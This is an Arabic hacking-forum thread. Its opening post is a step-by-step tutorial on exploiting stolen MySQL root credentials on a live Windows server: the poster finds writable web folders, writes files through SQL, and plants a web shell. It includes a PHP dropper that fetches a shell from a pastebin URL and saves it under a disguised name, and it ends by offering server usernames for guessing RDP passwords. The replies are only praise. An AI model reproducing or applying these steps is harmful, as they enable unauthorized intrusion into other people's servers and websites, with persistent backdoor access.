1. Dr.aL-jArH

    Dr.aL-jArH DeveloPer Plus

    الأنتساب:
    ‏24 أغسطس 2012
    المشاركات:
    140
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    كيف الحال يا شباب الحماية
    عسى الله يديم حفظه وبركاته علينا

    منذ فترة حصلت على رووت في قواعد البيانات على إحدى السيرفرات وكان ( وندوز سيرفر )
    وتفاجئت إنه أصحاب لي كثير ما عرفو يتصرفو فيه ولا يعرفو كيف يستخدموه
    وما زال الأمر غامض بالنسبة لهم رغم إنه بسيط لدى الكثيرين هنا ,, ما شاء الله
    فوعدتهم بشرح أوضح فيه إزالة هذا اللبس من أذهانهم

    ملاحظة بسيطة : Database root access on win server
    يعني : تستخدم أي سكربت للإتصال بقواعد البيانات
    أو حتى التي مرفقة بالشلات
    وتضع آي بي السيرفر الذي لديك
    و اليوزر : root والباس : الذي حصلت عليه


    الآن أنا استخدمت سكربت adminer-mysql.php للدخول للسيرفر

    [​IMG]

    الآن ظهرت لنا قواعد السيرفر [​IMG] ,, @ التي كل منها تمثل قاعدة لموقع من مواقع السيرفر

    [​IMG]

    وأنا اخترقت القاعدة 1651fytz حتى أجرب أحقن شل بداخلها
    وضعت الآي بي في سكربت لعرض مواقع السيرفر محاولاً إيجاد أي إسم لموقع يشبه إسم القاعدة المستهدفة
    فوجدت اسم الموقع مطابق تماماً

    [​IMG]

    ندخل للموقع ونشوف

    [​IMG]

    ههههههه ,, سبحان الله الموقع فيه أخطاء
    وهو المطلوب لكي نحدد المسارات الداخلية للسيرفر

    نجرب نبحث عن مجلد مصرح حتى نستطيع حقن شلنا بداخله
    أنا وجدت مجلدين مصرحين وهم : includes , images


    الآن بعد ما تخطينا عقبة مهمة وهي : تحديد الموقع والقاعدة والمجلد المصرح
    ,, نروح نجرب ننشأ ملف ع الموقع بعد ما عرفنا المسارات المصرحة

    كود PHP:
    D:\wwwroot\1651fytz\wwwroot\includes\
    D:\wwwroot\1651fytz\wwwroot\images\
    [​IMG]

    هو أمر SQL يقوم بكتابة ملف في المسار المحدد
    إلي يعرفون أساسيات الـphp ما رح يكون هالأمر غامض عليهم

    نروح نشوف هل حقاً أنشأ الملف إلي حفناه ؟!!

    [​IMG]

    بالفعل تم إنشاء الملف ..@ وهذا يعني إنه بإمكاننا حقن شل
    لكن أرجو الإنتباه هنا إلى أمرين وهما :

    1- استبدال السلاش \ بالسلاش / عند حقن الشل
    2- تجنب حقن أكواد كثيرة عند إنشاء الملف لكي لا يكون هنالك
    لخبطة وأخطاء وخصوصاً في إشارتي " و ' السنغل والدبل كوتيشن

    ولذلك وضعت لكم كود بسيط ينشأ ملف ويستدعي الشل بصيغة txt مرفوع مسبقاً

    وهذا هو الكود


    كود PHP:
     <?php
    $get 
    file_get_contents('http://pastebin.com/raw.php?i=5ZnaEDBN');
    $x fopen('.log_error.php','w+');
    $fw fwrite($x,$get);
    fclose($x);
    if(
    $fw){
    echo 
    'Done ~';
    }else{
    echo 
    'Not Worked !!';
    }
    ?> 
    وقمت ببرمجة سكربت بسيط يختصر العملية
    تدخل له اليوزر والباس والآي بي والقاعدة المحددة
    وهو بيحقن

    [​IMG]

    قمناا بالحقن عن طريق السكربت

    وهذه صورة لنجاح العملية

    [​IMG]

    تم رفع شل ^_* [​IMG]
    حاولت بالسيرفر قليلاً للتخطي ,~ لكن لم أفلح
    وأظن التخطي مسألة وقت فقط يعني مو بالصعوبة

    السيرفر مفعل الديسك توب و هذه اليوزرات للي بده يخمن

    [​IMG]


    ومتى تخطيت ننزل شرح آخر للتخطي

    السكربت موجود في الشرح , مرفق بنهاية الموضوع

    لم أرد أن أضع الشل في موضوع إلتزاماً بالقوانين
    ومن أراده أرسله له ع الخاص إن شاء الله

    في أمان الله

     
  2. عُبْدُالـڔבـَمَڼ

    عُبْدُالـڔבـَمَڼ Developer

    الأنتساب:
    ‏29 مارس 2012
    المشاركات:
    37
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    |[ HacKeR - Security - Hacking Software ]|
    الإقامة:
    |[ Saudi Arabia ]|
    رد: تخطي العقبات بعد الحصول على Database root access on win server

    بارك الله فيك أخي العزيز :{21}:
     
  3. IRAQRT

    IRAQRT Developer

    الأنتساب:
    ‏21 نوفمبر 2014
    المشاركات:
    68
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    بغداد
    رد: تخطي العقبات بعد الحصول على Database root access on win server

    عاشت لايادي على الشرح المميز تسلم حبيبي :*
     
  4. .ılı.Iяẫqi.ılı.

    .ılı.Iяẫqi.ılı. DeveloPer Plus

    الأنتساب:
    ‏22 ديسمبر 2012
    المشاركات:
    144
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    الإقامة:
    IraQ
    رد: تخطي العقبات بعد الحصول على Database root access on win server

    يعطييك ، ألعآفييه يآبطل ...!
     
  5. Norilkon

    Norilkon Developer

    الأنتساب:
    ‏8 ابريل 2012
    المشاركات:
    84
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    مــصــر
    رد: تخطي العقبات بعد الحصول على Database root access on win server

    يعطيك العافيه يالطيب
     
  6. MR.CAPTCHA

    MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    38
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    رد: تخطي العقبات بعد الحصول على Database root access on win server

    عاشت ايدك
     
  7. Mokhalad HaXor

    Mokhalad HaXor آداريً شؤون الأعضًاء

    الأنتساب:
    ‏3 يوليو 2012
    المشاركات:
    3,319
    الإعجابات المتلقاة:
    2,463
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:
    etc/shadow
    رد: تخطي العقبات بعد الحصول على Database root access on win server

    عاشت ايدك يا ورد :{4!}:
     

مشاركة هذه الصفحة